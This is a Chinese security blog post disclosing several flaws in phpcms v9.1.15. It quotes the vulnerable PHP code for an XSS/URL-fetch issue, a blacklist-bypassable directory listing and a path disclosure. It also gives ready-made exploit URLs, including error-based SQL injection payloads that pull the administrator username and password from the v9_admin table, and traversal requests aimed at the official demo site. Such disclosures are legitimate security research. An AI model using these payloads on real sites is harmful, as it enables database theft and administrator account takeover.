phpcms v9.1.15 多处 sql 及 XSS 缺陷

  • A+
所属分类:lcx

phpcms v9.1.15  官方演示站已更新到 9.1.16:http://v9.demo.phpcms.cn/

XSS

public function public_get_suggest_keyword() {
               $url = $_GET['url'].'&q='.$_GET['q'];
               echo $url;
              
              $res = @file_get_contents($url);
               if(CHARSET != 'gbk') {
                      $res = iconv('gbk', CHARSET, $res);
               }
               echo $res;
        }

利用方法:

http://localhost/phpcms/index.php?m=search&a=public_get_suggest_keyword&url=http://localhost/&q=1

新建一个名为&q=1的文件 写入

黑名单过滤:这里只说过滤方式. 这里并没有权限访问

if(!$this->admin_username) return false;
    if($_GET['args']) extract(getswfinit($_GET['args']));
    $dir = isset($_GET['dir']) && trim($_GET['dir']) ? str_replace(array('..', '../', './', '.','..'), '', trim($_GET['dir'])) : '';
    $filepath = $this->upload_path.$dir;
    $list = glob($filepath.'/'.'*');
    if(!empty($list)) rsort($list);
    $local = str_replace(array(PC_PATH, PHPCMS_PATH ,DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR), array('','',DIRECTORY_SEPARATOR), $filepath);
    $url = ($dir == '.' || $dir=='') ? $this->upload_url : $this->upload_url.str_replace('.', '', $dir).'/';
    $show_header = true;
    include $this->admin_tpl('album_dir');

http://localhost/phpcms/index.php?m=attachment&a=album_dir&dir=.. 用黑名单过滤始终是不可取的

路径泄露

if (empty($filename)) $filename = ROUTE_C; 
     if (empty($m)) $m = ROUTE_M;
     $filepath = PC_PATH.'modules'.DIRECTORY_SEPARATOR.$m.DIRECTORY_SEPARATOR.$filename.'.php';
     if (file_exists($filepath)) {
            $classname = $filename;
            include $filepath;
            if ($mypath = pc_base::my_path($filepath)) {
                   $classname = 'MY_'.$filename;
                   include $mypath;
            }
            return new $classname;

没进行容错处理提交:

http://v9.demo.phpcms.cn/index.php?m=../model&c=member_group_model.class

由于member_group_model.class 类不存在 会报错

Fatal error: Class 'member_group_model.class' not found in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/classes/application.class.php on

http://v9.demo.phpcms.cn/index.php?m=../../

Fatal error: Cannot redeclare timeinterval() (previously declared in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php:15) in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php on line 27

SQL注入:

phpcms v9.1.15 多处 sql 及 XSS 缺陷

http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1

phpcms v9.1.15 多处 sql 及 XSS 缺陷

http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.password+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1

phpcms v9.1.15 多处 sql 及 XSS 缺陷

文章来源于lcx.cc:phpcms v9.1.15 多处 sql 及 XSS 缺陷

相关推荐: 【Poc】VNC4.1.3溢出漏洞利用代码

Vulnerability............Denial-of-Service Software.................RealVNC VNC Server Free Edition 4.1.3 Download................…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: